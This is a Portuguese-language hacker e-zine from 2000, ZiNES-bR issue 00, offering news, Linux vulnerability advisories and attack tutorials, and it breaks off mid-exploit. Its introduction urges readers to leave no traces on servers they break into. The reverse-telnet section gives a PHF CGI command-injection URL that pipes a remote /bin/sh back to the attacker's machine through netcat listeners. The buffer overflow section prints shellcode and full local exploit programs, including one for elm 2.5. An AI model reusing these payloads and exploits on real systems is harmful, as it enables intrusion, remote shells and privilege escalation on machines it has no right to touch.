o............................................................................................o
.   ZZZZZZZZZZ   ::   NNNn    nNN  EEEEEEE   sSSSSSS               bb                        .
.   ZzZ   ZZ          NN NN    NN  EEeeeee  sSSS  sSs              bb                        .
.   Zz   ZZ      ii   NN  NN   NN  EE       sSS                    bbB         rr  rrrrrrr   .
.       ZZ       ii   NN   NN  NN  EEeE       sSS       _______    bbbbbbbbb    rrr   rrr    .
.      ZZ   zZ   ii   NN    NN NN  EE           sSS     @@@@@@@    bb   Bbbb    rr           .
.     ZZ   ZzZ   ii   NN     NNNN  EEeeeee SSs  sSSS               bbB   bbb    rrr          .
.   ZZZZZZZZZz  iiii  NNn     nNN  EEEEEEE  sSSSSSs                bbbbbbbbb   rrrrrr        .
o............................................................................................o
                                                          


.:x| Zine 00                 |x:.
.:x| 07/10/00                |x:.
.:x| #ZiNESbR - Rede BrasIRC |x:.
.:x| http://www.zines-br.com |x:.
.:x| zine@zines-br.com       |x:.

:x: Melhor visualizado no WordPad do Windows 							     :x: 
:x: Melhor visualizado no Vi do Linux usando o X-Term (Maximizado)			     :x:	
:x: Todo contedo deste ZiNE sao para fim educativo                                    :x:
:x: Nao nos responsabilizamos por usos indevidos                                       :x:

______________________________________________________________________________________________
''''''''''''''''''''''''''''''''''''''''''''ZinesBr'''''''''''''''''''''''''''''''''''''''''''
      		 				     	
      [SETORES]#  	 				     [AUTORES]$	

<<[00][ Introducao	                           ] [ GoToxY    ][00]>>      
<<[01][ News                                       ] [ Gotoxy    ][01]>>
<<[02][ Vulnerabilidades                           ] [ GoToxY    ][02]>>       
<<[03][ Telnet reverso                             ] [ TankDS    ][03]>>
<<[04][ Buffer Overflow                            ] [ Cync      ][04]>>
<<[05][ Linux                                      ] [ Stealth   ][05]>>
<<[06][ Conectando a cobrar                        ] [ 0_of_Coll ][06]>>
<<[07][ Aumentando os bps                          ] [ GoToxY    ][07]>>
<<[08][ Links                                      ] [ Kbytes    ][08]>>
<<[09][ Scaneadores					   ] [ Gotoxy    ][09]>>
<<[10][ Memoria 				   		   ] [ Gotoxy    ][10]>>
<<[11][ Ro0t 				   		   ] [ Gotoxy    ][11]>>
<<[12][ Curiosidade     				   ] [ Gotoxy    ][12]>>
<<[13][ Compartilhamento e um super bonus		   ] [ Gotoxy    ][13]>>
<<[14][ Dicas de Win\Lnx                           ] [ GoToxY    ][14]>>
<<[15][ Hacking Winnt4.0 (RDS)                     ] [ GoToxY    ][15]>>
<<[16][ Shell Script   					   ] [ Gotoxy    ][16]>>
<<[17][ Palavras finais                            ] [ GoToxY    ][17]>>

______________________________________________________________________________________________
''''''''''''''''''''''''''''''''''''''''''''ZinesBr'''''''''''''''''''''''''''''''''''''''''''


SETOR [00]			
==[ Introducao ]==
==[ Por Gotoxy ]== 
	
Ae! Estamos lanando nosso primeiro zine.  E veja bem, nao esta sendo fcil... Portanto,
criticas  nao  serao  bem  vindas... Este grupo nao traz  nenhum fim  lucrativo,  apenas 
fazemos isso por diversao.  Sempre na 'introducao'  do zinesbr,  vou  sempre  reelembrar 
que nao ns responsabilizamos pelos textos do zine. Pois,caso voce  aprenda alguma coisa
de util aqui e fizer algo de errado no servidor e der sujeira para voce, nao venha dizer
que nos que somos os responsaveis por isso.  Como a  tecnologia  evoluiu  bastante , nao
h meios de nao ser pego. isto eh, se o admin for esperto. mas, nao precisa se preocupar,
existe muitos admin burros por ai. entao, procure ser esperto tb,  nunca deixando rastros
por onde passar. Estamos aqui para aumentar o seu conhecimento e sabedoria,  e nao  a sua
ignorancia. Se voce estiver interessado em "enriquecer"  o  ZiNES-bR, nao deixe de mandar 
algum texto. Caso mande, o seu texto estara na nossa proxima edicao. Ah! Peo-lhe que nao
mande bobagens, como: invasao por ftp, hackeando com o frontpage...etc...  porque nos nao
vamos publicar. O mail eh zine@zines-br.com - Obrigado pela compreensao. E Boa Leitura!


											     
											    Gotoxy
					                                        gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------------ |x:.

					     







SETOR [01]			
==[ News       ]==
==[ Por Gotoxy ]==

Ae! Aqui tem algumas noticias para voces ficarem bem atualizados. Como atrasamos um pouco,
algumas News estao Olds (velhas) hehe.. mas, eh bom saber o que aconteceu ou o que deixou
de acontecer. E nao pule essa parte kra, pois nao pense que escrever isso aqui eh moleza.
Nao vou obriga-lo a ler, leia se quiser.. "A vontade eh do fregues". :p	

			
 
							[ News #1 ]
-> Expo Linux Brasil

'Evento internacional reunir personalidades do mundo linux'

Os users lnx jah podem comemorar: finalmente acontecer no brazil a Linux Expo, um evento 
internacional que reunir os maiores especialistas no assunto. Acontecer nos dias 26 e 27
de setembro, no Palcio das Convenes do Anhembi. O evento contar com a presena de diver-
sas empresas, como: VA Linux, HP, Conectiva, Red Hat, Oracle, IBM, Suse, Compaq, Linuxcare,
Systems, Sysbase, Cyclades e Free Software Foundation. Ocorrer palestras e vris outras 
coisas. O acontecimento est sendo organizado pela Sky Events, que promove eventos de linux
por todo o mundo. A Linux Expo jah aconteceu em diversas cidades. 
A inscrio eh totalmente gratuita. Para isso, basta entrar no site www.linuxexpobrasil.com
e solicitar suas credenciais. 


							[ News #2 ]
-> Segurana Mxima

'Livro em ingles mostra segredos e tcnicas para proteger sistemas Linux'

Um grupo hacker, lanou um livro chamado Maximum Linux Security. Onde seu principal
objetivo eh manter um sistemas Linux bem protegido contra ataques. No livro, estao abordados
muitos assuntos como crackers, sniffers, spoofers e etc. Bom, caro adm leigo, sugiro q compre
um livro destes para administrar bem a sua rede linux. Por enquanto, o livro estah em ingles, 
e pode ser encontrado em www.amazon.com. O nome completo do livro eh: 'Maximum Linux Security:
A Hacker's Guide to Protecting Your Linux Server and Workstation.


							[ News #3 ]
-> HackersLab

Puts, voce jah deve estar sabendo disso, certu? nao?? tudo bem.. entao, vou explicar:
O site - www.hackerslab.org/eorg/ -  promoveu um concurso de hacking. q vai do level 0
at o level 15. 
Primeiro tem q cadastrar e depois comeca o hacking..ehh o seguinte, vc tem que completar
tarefas. a cada tarefa voce recebe uma instrucao. por exemplo, a tarefa pra se passar do
level 0 para o level 1, eh instalar uma backdoor na makina e pegar o passwd. tendeu? 
At que nao eh ruim nao... 


							[ News #4 ]
-> Surge o primeiro vrus para o Palm

Uma verso adulterada do programa Liberty, um emulador de GameBoy,  o primeiro vrus conhecido 
para micros Palm. O falso Liberty destri todos os aplicativos instalados no aparelho. O aspecto
curioso  que esse programa foi criado por um dos autores do verdadeiro Liberty. 
O sueco Aaron Ardiri  um programador que, junto com outros, desenvolveu o emulador de jogos do 
Game Boy para Palm. 
Ele diz que sua inteno era apenas mostrar a verso destrutiva do software para amigos num 
forum de debates. O produto, explica, era uma aplicao-teste para punir crackers interessados 
em copiar sem pagar o verdadeiro Liberty, que  um produto comercial. 
O problema  que o produto ficou disponvel durante uma hora no frum e possivelmente foi 
baixado por alguns internautas.
At o momento, no h informaes de que algum tenha sido prejudicado. De todo modo, a 
experincia de Ardiri fica marcada como o primeiro vrus para Palm. 
A Palm, fabricante do sistema, minimiza os riscos do vrus. Para ela, basta reiniciar o sistema, 
sincroniz-lo com os dados armazenados no PC e tudo volta ao normal. 


						==[ News #5 ]==

-> Mitnick dar palestra sobre Seguranca 


Kevin Mitnick dara palestras sobre seguranca corporativa e Internet num congresso sobre 
comercio eletronico em setembro. 

Segundo a empresa organizadora do congresso, Mitnick tentara explicar os 
motivos que levam determinadas pessoas a invadirem e atacarem redes, 
alem de sugerir o que as organizacoes podem fazer para impedir a acao 
dos criminosos. 


						==[ News #6 ]==
-> Hackers invadem Firewall-1

O que era considerando o firewall mais seguro do mundo foi invadido durante uma 
conferencia nos EUA

Nenhum sistema de seguranca eh infalivel. Esta maxima pede ser comprovada mais uma vez
durante a Black Hat, uma convencao de hackers realizada em Las Vegas. Durante o evento, 
3 hackers demonstraram a palestra a plateia  como  conseguiram  invadir  o  Firewall-1, 
considerando um dos sistemas mais seguros do mundo. Foram identificadas tres categorias 
de ataques: na primeira os intrusos se faziam  passar  pelo  administrador da rede para 
obter o acesso. No segundo, burlavam as regras do firewall  para que  uma  conexao  nao 
permitida passase a ser lida como autorizada. Eles  tb  exploraram  erros  no  exame do 
trafego de informacoes para infiltrar comandos perigosos. P/ que estas vulnerabilidades
nao fossem exploradas por outras pessoas a Checkpoint,empresa que desenvolveu o FIREWA-
LL-1, jah disponibilizou um programa que corrige alguns dos problemas que permitiram  a
invasao do Firewall-1. Este pacote pode ser obtido no site www.checkpoint.com


						
						==[ News #7 ]==

			Chega de news, leia abaixo algumas vulnerabilidades !!
							
						                                  
											    Gotoxy
					                                        gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------------ |x:.



  





SETOR [02]
==[ Vulnerabilidades ]==
==[ Por GoToxy       ]==      
        
        Ae, windows users, nem leiam! Quero dizer, podem at ler neh, mas o problema  
que nao coloquei nenhuma vulnerabilidades para voces. Sintu muito.. Quem sabe um dia eu
coloque. Enquanto isso, linux users, curtem as vulnerabilidades abaixo:

			

						==[ Vulnerabilidade #1 ]==

Pacote: Usermode
Resumo: Obteno local de privilgios de root 

DESCRICAO DO PROBLEMA: 
O pacote usermode foi criado para permitir que usurios do console (ou seja, 
usurios com conta shell e acesso fsico) executassem certos comandos 
privilegiados. Para isto, basta que estejam logados no console e forneam sua 
senha (e no a de root). dentre estes comandos privilegiados esta o shutdown. 
Outros sao reboot e halt, para reinicializar e desligar a makina, respectivamente. 
O programa shutdown nao soh leva a mquina para o reboot ou desligamento, mas tambm 
para outros runlevels. Dentre eles, o runlevel 1, que eh o do mono-usurio, normalmente 
usado para tarefas de rescue ou quando se esqueceu a senha de root. A falha de segurana 
eh que um usurio comum pode executar este comando, bastando estar no console e fornecer 
sua senha.. 

SOLUCAO: 
Todos os usurios devem atualizar o pacote usermode imediatamente. Este pacote 
novo nao mais fornece o link para o programa shutdown, de forma que soh o superusurio
poder execut-lo. Os comandos reboot e halt continuam podendo serem executados por 
usurios comuns, desde que estejam no console e forneam sua senha. Administradores que
nao quiserem dar este poder para usurios podem apenas remover o pacote usermode e ento 
somente o superusurio poder executar estes comandos, nao sendo necessrio atualizar o 
pacote. 


						==[ Vulnerabilidade #2 ]==
Pacote: diskcheck 
Resumo: Criao insegura de arquivo no /tmp 

DESCRICAO DO PROBLEMA: 
O script diskcheck.pl deste pacote roda de hora em hora e verifica o espao livre em vrias 
parties. Havendo pouco espao disponvel, um email eh enviado ao administrador. Este script 
roda como root, e cria um arquivo no diretrio /tmp de forma insegura, podendo um atacante 
utilizar ataques de link simblico para criar arquivos em qualquer rea do sistema. 
					    
SOLUCAO:
Todos os usurios devem atualizar o pacote. O pacote atualizado no mais utiliza 
arquivos temporrios para fazer a mesma tarefa. 



						==[ Vulnerabilidade #3 ]==

PACOTE: mailman-beta5 
Resumo : Obteno de privilgios do usuario mailman

DESCRICAO DO PROBLEMA: 
O programa "wrapper" que faz parte do pacote mailman possui uma vulnerabilidade que pode levar 
a obteno de privilgios equivalentes aos do usurio mailman. Este usurio possui acesso de 
leitura e escrita a todos os arquivos instalados pelo pacote. A vulnerabilidade  *local* 
(necessita de shell na mquina para ser explorada) e nao resulta em qualquer outro tipo de 
privilegio. :(

SOLUCAO: 
Todos os usuarios do gerenciador de listas mailman devem fazer a atualizao do pacote.
 

						
						==[ Vulnerabilidade #4 ]==

PACOTE:  perl 
Resumo:  Obteno local de privilgios de root #2


DESCRICAO DO PROBLEMA: 
O programa sperl, um SUID root, executa o programa /bin/mail quando detecta algum abuso no seu 
uso, mas faz isso de forma insegura, nao limpando as variveis de ambiente. Com a varivel 
"interactive" setada, o programa mail pode executar comandos embutidos na mensagem a ser 
enviada. Um exploit funcional jah foi publicado, e fornece um shell de root.

SOLUCAO: 
Todos os usurios devem atualizar o pacote imediatamente. Caractersticas desta atualizao: 
- sperl no mais envia email 
- sperl no mais  SUID root: usurios que necessitarem desta funcionalidade devero setar o 
bit SUID manualmente 
- o Conectiva Linux 5.0 (e as duas ferramentas: programas grficos e e-commerce) devero tambm 
instalar o pacote perl-MD5, pois o pacote perl atualizado nao mais contm este mdulo. As 
outras distribuies nao precisam atualizar o perl-MD5. 
 

Bom, por enquanto coloquei soh estas... na proxima edicao eu colocarei mais.  Portanto,
aguardem a chegada do nosso proximo ZiNE!!!



						                                  Gotoxy
					                                        gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------------ |x:.









SETOR [03]
==[ Telnet reverso ]==
==[ Por TankDS     ]==

E ae! 
Bom, neste tema irei abordar ai uma tcnica um tanto quanto interessante: o telnet reverso! 
mas vc deve estar c perguntando o q eh isso? bom vou explicar um pouco...
Quando vc encontra servers com apenas as portas 80 e 443 abertas, dificulta muito sua
invaso, e neste caso vc vai procurar por falhas no servidor ou cgi's, ai q entra o telnet 
reverso, ele baseia-se em criar uma conexo do alvo p/ sua makina. E como muitos UNIX jah vem 
com o telnet abilitado como padro, e seu uso raramente controlado, isto fica fcil para vc 
poder efetuar um telnet reverso, vc precisar do nc (netcat). Como o telnet vir do alvo, vc 
precisar deixar o nc "ouvindo" na porta do qual vc mandar o server executar o telnet. Vou dar 
um exemplo aki de como c faz isto.

OBS: usarei as portas 80 e 25, neste caso certifique-se q nada esteja rodando nelas, caso tenha 
de um kill, usarei p/ mostrar o bug do cgi PHF, mas vc pode usar outro, e por final vc precisa 
ter um server bugado (duh..)
chega de mela mela e vamos ao hacking =]

a string:

/bin/telnet seu_ip 80 | /bin/sh | /bin/telnet seu_ip 25

o mtodo:

www.alvo.com.br/cgi-bin/phf?Qalias=x%0z/bin/telnet%20seu_ip%2080%20|%20/bin/sh%20|%20\
bin\telnet%20seu_ip%2025

isso far o server dar o telnet na sua makina, mas antes de executar este comando deixe o netcat
"ouvindo" nestas portas:

nc -l -n -v -p 80
nc -l -n -v -p 25

que legal vc conseguiu fazer isto, mas naum entendeu o q acontece? vou explicar.. =]
/bin/telnet seu_ip 80 conecta o servidor ao nc na porta 80, eh aki q digitaremos nossos 
comandos. Adotando mecanismos de entrada/saida convencionais do unix, a sada padro, e as 
teclas precionadas vaum p/ /bin/sh, o shell criado. Os resultados dos comandos sao enviados 
para /bin/telnet seu_ip 25. O resultado disso eh um telnet reverso, que "desenrola" em duas 
janelas separadas. escolhi as portas 80 e 25 pq saum servios comuns e normalmente permitida 
pelos firewalls, mas vc pode escolher outras =]
por enquanto eh soh isso! espero poder ter passado um conhecimento a mais p/ vcs!

Gotoxy, valeuz por ter cedido um espao aki!
Qualquer duvida, sugesto ou critica mande-me um e-mail: 

											    Tankds
					                                        tankds@zines-br.com
.:x| ------------------------------------------------------------------------------------ |x:.










SETOR [04]
==[ Buffer Overflow ]==
==[ Cync            ]==

-[ Introducao ]-
        Dedico esse texto a todos aqueles que sentem necessidade de obter
um "background"  em  buffers  overflows, incentivando assim  a  busca e o 
continuo estudo, priorizando o verdadeiro conhecimento.
 
        Inumeros ataques relacionados a problemas com buffer overflows tem sido
reportados e varios programas ainda contem esse tipo de bug, que eh um dos 
grandes fatores relacionados ao acesso ilegal a informacao. O esclarecimento 
desse tipo de ataque se faz de grande importancia `a todos que trabalham com 
segurancada informcao. Espero de alguma forma contribuir no entendimento dessa 
tecnica.
	
        Este txt tem como objetivo explicar algumas tecnicas avancadas
de Buffer Overflow em boxes Intel/x86 Linux. Para ler e aproveitar ao maximo o
conteudo desse documento sao necessarios 3 fatores basicos:

       [#] Conhecimento de Assembler, C e Linux.
       [#] Possuir alguma base / conceito com relacao a Buffer Overflows.

	Mais uma vez, como todos os txt's sobre buffer overflow, recomenda-se
a leitura da Phrack 49, artigo 14 (Smashing The Stack). Um otimo trabalho
realizado por AlephOne.


-[ Linux & ASM ]-

	De um modo geral voce nao precisa usar assembler em se tratando de 
programacao para Linux. Diferente do DOS voce nao eh obrigado a escrever
drivers para Linux em assembler (O que eh feito em C).

     "Voce pode precisar usar assembler ou voce pode querer usar assembler."

       [Algumas Diferencas]

	* Sintaxe AT&T:
		Como o GAS(GNU ASSEMBLER) foi criado para suportar compiladores
	UNIX de 32-bit, ela utiliza a sintaxe AT&T padrao. Essa sintaxe nao e'
	pior, nem melhor do que a sintaxe Intel, ela e' apenas diferente, quando
	voce ja estiver usando, achara bem mais regular, porem um pouco chata.


	* Algumas Diferencas da Sintaxe AT&T/INTEL:

	1. Nome dos registradores veem acompanhados do prefixo %:
		AT&T:  %eax
      		Intel: eax

	2. A ordem, Origem/Destino:
		Na sintaxe AT&T a origem esta sempre na esquerda e o destino na
		direita. ex: vamos carregar ebx com o valor de eax:

		AT&T:  movl %eax, %ebx
		Intel: mov ebx, eax

	3. Formato de valores constantes/imediatos
      		Devem vir acompanhados de um "$". Vamos carregar eax com o
		endereco da variavel "C" r0x, que eh estatica.

		AT&T:  movl $_r0x, %eax
		Intel: mov eax, _r0x

	Carregando ebx com 0xd00d:
		AT&T:  movl $0xd00d, %ebx
      		Intel: mov ebx, d00dh

	4. Tamanho do operador
		Cada instrucao vem acompanhada de um sufixo, que pode ser: b, w
		ou l. Eles especificam o tamanho do operando. O sufixo b e' para
		(8-bit) byte, w e' para (16-bit) word, e l e' para (32-bit) long.
		Os sufixos sao opcionais quando o tamanho pode ser 'adivinhado'
		pelos operandos.


--[ Buffers Overflows ]--

	O principio do buffer overflow  bem simples. Eh resultado de quando 
se poe mais dados num buffer do que ele pode suportar. Frequentemente devido a
erros na programacao, podemos tomar vantagem para execucao de codigo arbitrarios.

	Ao longo do texto voce ira absorver melhor todos esse conceitos, eh
importante que voce preste atencao e em caso de duvida releia e reflita.

  	Obs: Um buffer eh um simples bloco de memoria que armazena multiplas
solicitacoes de um mesmo tipo de dado.
 
	STACK:
	A principal funcao da CPU eh o processamento e movimentacao de dados.
Enquanto processa esses dados ela precisa de um lugar para rapidamente salvar
informacoes importantes devido ao espaco limitado dos registradores("celulas de
memoria"). Essa informacao eh salva no stack, um parte muito especial da memoria
que pode ser acessada com algumas instrucoes em assembler. O stack eh variavel
em tamanho e posicao.

	A primeira coisa  guardada no stack sera  a ultima a ser lida, e a 
ultima a ser guardada sera a primeira  a ser lida, esse sistema eh chamado de
LIFO, ou "last in,first out" (ultimo dentro, primeiro a sair),vamos a um
exemplo, vamos executar um programa (em caso, para conseguir root mais tarde,
haha), como o stack pareceria quando o processo chamaria suas variaveis
dinamicas?

                          .
                          :   ...                 .
                          |-----------------------:
             -2048 bytes  |   local array1[1024]  |  ...
                          |-----------------------|
             -1024 bytes  |   local array2[1024]  |  size 1024 bytes
                          |-----------------------|
  posicao atual do stack  |   base pointer        |  size 4 bytes
                          |-----------------------|
                +4 bytes  |   return adress       |  size 4 bytes
                          |-----------------------|
                +4 bytes  :   parametros ...      |  ...
                          .                       :

   As variaveis sao  diferentes, e a informacao  guardada no stack, todo
cpu usa um 'stack pointer', para  marcar a posicao atual, eh chamada  de
SP. as partes a serem analizadas  serao o 'local array2' e o 'return  
adress', so isso eh necessario para termos root.

--[ ABUSANDO DO RETURN ADDRESS...]--
     Lembrando,quando eh executado algo, o CPU salva um 'return adress' no stack.
se o processo eh finalizado, o cpu pula e acha o 'return adress'. mas, se o
processo salva mais  bytes em uma variavel local do que seu tamanho normal,
ira acontecer o 'overwrite', ira  sobrescrever  o 'return adress' antigo, e
assim sera nomeado 'overflow'. 

 
 Se (1024+8)1032 vezes o caractere "x" for escrito no array2 local,o proces-
 so ira escrever novamente o 'return adress'. e o stack ira parecer:
                           .
                          :   ...                 .  .
                          |-----------------------:
             -2048 bytes  |   local array1[1024]  |  ...
                          |-----------------------|
             -1024 bytes  |   1024 times "X"      |  size 1024 bytes
                          |-----------------------|
  posicao atual do stack  |      4 times "X"      |  size 4 bytes
                          |-----------------------|
                +4 bytes  |      4 times "X"      |  size 4 bytes
                          |-----------------------|
                +4 bytes  :   parametros ...      |  ...
                          .                       :
  Assim, agora nos poderemos forcar o programa a pular onde nos quizermos!
ira sera muito interessante. poderemos criar um codigo no 'local variable'.

                            :   ...                 .
                          |-----------------------:
             -2048 bytes  |   local array1[1024]  |
                          |-----------------------|
             -1024 bytes  |   our code            | < -
                          |-----------------------|    |
  posicao atual do stack  |   4 bytes de lixo     |    |
                          |-----------------------|    |
                +4 bytes  |    jmp pro codigo     | ___|
                          |-----------------------|
                +4 bytes  :   parametros ...      |
                          .                       :


--[ Executando a shell em assembler ou em c ]--

    Se nosso  codigo executara uma shell  normal, e nos  criamos o programa
de overflow, poderemos ter todos os privilegios de root.nos precisaremos
agora, eh de um pequeno codigo em assembler que ira executar a shell,nao
eh necessario mesmo executar a shell,mas, neste caso, oque interessa eh o
root. he, voce  pode conseguir  a shell em assembler, ou  compilar  ela em
'c', com a denominacao do 'execshell'.


--[ SHELLCODE ]--

  Agora ja sabemos que podemos modificar o 'return address' e o fluxo de
execucao, o que queremos que o programa execute? Na maioria dos casos nos
queremos q o code obtenha um shell. A partir da shell podemos usar nossa
criatividade...
  Resumindo, o shellcode eh basicamente uma serie de comandos em assembler
que nos escrevemos no stack e entao mudamos o 'return address' para voltar
ao stack. Assim, podemos inserir nossa instrucao dentro de um processo
vulneravel e entao executa-lo, exatamente no stack.
 Nosso objetivo agora eh gerar um codigo em assembler, que execute um shell.
Bem, uma comumente usada system call, eh a execve(), ela carrega e roda qual
quer binario, terminando a execucao do processo atual.

cync[tty7/1][~]$man execve (Por Favor Leia com atencao a man page)


 Vamos agora obter os detalhes dessa syscall da glibc2
 cync[tty7/1][~]$gdb /lib/libc.so.6
 (gdb) disas execve

  Dump of assembler code for function __execve:
0x8e950 <__execve>:     pushl  %ebx
0x8e951 <__execve+1>:   movl   0x10(%esp,1),%edx
0x8e955 <__execve+5>:   movl   0xc(%esp,1),%ecx
0x8e959 <__execve+9>:   movl   0x8(%esp,1),%ebx
0x8e95d <__execve+13>:  movl   $0xb,%eax
0x8e962 <__execve+18>:  int    $0x80
0x8e964 <__execve+20>:  popl   %ebx
0x8e965 <__execve+21>:  cmpl   $0xfffff001,%eax
0x8e96a <__execve+26>:  jae    0x8e96d <__execve+29>
0x8e96c <__execve+28>:  ret
0x8e96d <__execve+29>:  pushl  %ebx
0x8e96e <__execve+30>:  call   0x8e973 <__execve+35>
0x8e973 <__execve+35>:  popl   %ebx
0x8e974 <__execve+36>:  xorl   %edx,%edx
0x8e976 <__execve+38>:  addl   $0x5b861,%ebx
0x8e97c <__execve+44>:  subl   %eax,%edx
0x8e97e <__execve+46>:  pushl  %edx
0x8e97f <__execve+47>:  call   0x175e0
0x8e984 <__execve+52>:  popl   %ecx
0x8e985 <__execve+53>:  popl   %ebx
0x8e986 <__execve+54>:  movl   %ecx,(%eax)
0x8e988 <__execve+56>:  orl    $0xffffffff,%eax
0x8e98b <__execve+59>:  jmp    0x8e96c <__execve+28>


 olhe isso:
./shellcod /bin/sh

main() {
        __asm__("
        jmp   0x1f
        popl  %esi
        movl  %esi,0x8(%esi)
        xorl  %eax,%eax
        movb  %eax,0x7(%esi)
        movl  %eax,0xc(%esi)
        movb  $0xb,%al
        movl  %esi,%ebx
        leal  0x8(%esi),%ecx
        leal  0xc(%esi),%edx
        int   $0x80
        xorl  %ebx,%ebx
        movl  %ebx,%eax
        inc   %eax
        int   $0x80
        call  -0x24
        .string \"/bin/sh\"");
}
-----------------( hex code )--

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
        "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
        "\xff\xff/bin/sh"

 Percebeu a jogada?, temos um shellcode obtido a partir da otimizacao do codigo
 em assembler que somente representa a execucao de um /bin/sh. Existem diversos
 tipos de shellcode, cada um com seu objetivo especifico. 


 [ EXEMPLO PRATICO ]

 vulneravel.c

#include<string.h>
#include<ctype.h>

int main(int argc,int **argv)
{
        char buffer[1024];
        int i;
        if(argc>1)
        {
                for(i=0;i<strlen(argv[1]);i++)
                        argv[1][i]=toupper(argv[1][i]);
                strcpy(buffer,argv[1]);
        }
}


--------------------------------[exploit1.c]-------------------------------
#include<stdio.h>
#include<stdlib.h>

#define ALIGN                             0
#define OFFSET                            0
#define RET_POSITION                   1024
#define RANGE                            20
#define NOP                            0x90

char shellcode[]=
        "\xeb\x38"                      /* jmp 0x38              */
        "\x5e"                          /* popl %esi             */
        "\x80\x46\x01\x50"              /* addb $0x50,0x1(%esi)  */
        "\x80\x46\x02\x50"              /* addb $0x50,0x2(%esi)  */
        "\x80\x46\x03\x50"              /* addb $0x50,0x3(%esi)  */
        "\x80\x46\x05\x50"              /* addb $0x50,0x5(%esi)  */
        "\x80\x46\x06\x50"              /* addb $0x50,0x6(%esi)  */
        "\x89\xf0"                      /* movl %esi,%eax        */
        "\x83\xc0\x08"                  /* addl $0x8,%eax        */
        "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
        "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
        "\xb0\x0b"                      /* movb $0xb,%al         */
        "\x89\xf3"                      /* movl %esi,%ebx        */
        "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
        "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
        "\xcd\x80"                      /* int $0x80             */
        "\x31\xdb"                      /* xorl %ebx,%ebx        */
        "\x89\xd8"                      /* movl %ebx,%eax        */
        "\x40"                          /* inc %eax              */
        "\xcd\x80"                      /* int $0x80             */
        "\xe8\xc3\xff\xff\xff"          /* call -0x3d            */
        "\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh"     */
                                        /* /bin/sh is disguised  */

unsigned long get_sp(void)
{
        __asm__("movl %esp,%eax");
}
main(int argc,char **argv)
{
        char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
        long addr;
        unsigned long sp;
        int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
        int i;

        if(argc>1)
                offset=atoi(argv[1]);

        sp=get_sp();
        addr=sp-offset;

        for(i=0;i<bsize;i+=4)
        {
                buff[i+ALIGN]=(addr&0x000000ff);
                buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;
                buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
                buff[i+ALIGN+3]=(addr&0xff000000)>>24;
        }

        for(i=0;i<bsize-RANGE*2-strlen(shellcode)-1;i++)

                buff[i]=NOP;

        ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
        for(i=0;i<strlen(shellcode);i++)
                *(ptr++)=shellcode[i];

        buff[bsize-1]='\0';

        printf("Jump to 0x%08x\n",addr);

        execl("./vulnerable1","vulnerable1",buff,0);
}
/* Creditos: Taeho. */

------------------------------------------------------------------------------

 [ Nosso proprio local exploit - by MBC LABS ]

 /*
  Entendendo o EXPLOIT!
  (Voce sabe C o suficiente, nao sabe?)

  Shellcode: Shellcode padrao, utilizado para executar o /bin/sh. Nada mais do que  um codigo 
em assembler retirado da funcao execve, com o auxilio do gdb e colocado em hexadecimal.

  Como conseguir o endereco de retorno???

  Bem, uma das alternativas, no caso a mais simples seria atraves do gdb, pelo
  arquivo de core gerado devido ao famoso "segmentation Fault".

->  bash# gdb /usr/bin/elm core
->  gdb> info register
->  ps: de uma olhada no endereco do %esp ;)

  Gerando o core...
  elm -f `perl -e 'printf "x" x 300'` <- (sobrescrevendo return address)


--[ cut here ]--------------------------------------------------------------  

/* elm 2.5 PL1 local exploit, (c) 1999 aux-tech [www.aux-tech.org]
 * code by drk, drk@aux-tech.org
 *
 * gives you egid 'mail'
 *
 * works on slackware 3.5, 3.6, 3.9, 4.0, 7.0
 * greets: aghi, visi0n, cryonic, strfry, sgi, x5, and all ppl from aux
 * MBC Security LABS: cync, drk, SkyLaZarT, oldm
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define ELMPATH "/usr/local/bin/elm" // CHANGE @!#

/* shellcode ... ou seja .. eh  basicamente um conjunto de codigos hexa-decimais 
 * especificos de uma plataforma no qual consiste na execucao de uma "shell".
*/
 
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* funcao no qual so' se aplica a exploits locais .. seu objetivo eh "achar" o   
* endereco do topo da stack para que este mesmo endereco possa ser reescrito    
* com codigos arbitrarios.
*/
 
long get_esp(void) {
    __asm__("movl %esp,%eax\n");
}

/* funcao principal */

void main( int argc, char **argv ) {
  char *buff, *ptr;
  int offset=0, bsize=300, i;
  unsigned long sp,addr;


  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  buff = malloc(bsize);

  if(!buff) {
    perror("malloc()");
    exit(0);
  }

  /* chama a funcao get_esp() para que ela retorne o endereco do topo da stack
  */

  addr = (sp = get_esp()) - offset;

  /* creditos :) */
  printf("elm 2.5 PL1 exploit (linux) by drk, drk@aux-tech.org\n");
  printf("addr: [0x%x], bsize: [%i], offset: [%i]\n", addr,bsize,offset);

  /* byte shifting */
  for (i = 0; i < bsize; i+=4) {
      buff[i  ] = (addr & 0x000000ff);
      buff[i+1] = (addr & 0x0000ff00)>>8;
      buff[i+2] = (addr & 0x00ff0000)>>16;
      buff[i+3] = (addr & 0xff000000)>>24;
  }

  /* matematica pura :) */

  for (i = 0; i < (bsize/2); i++) buff[i] = 0x90;
  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

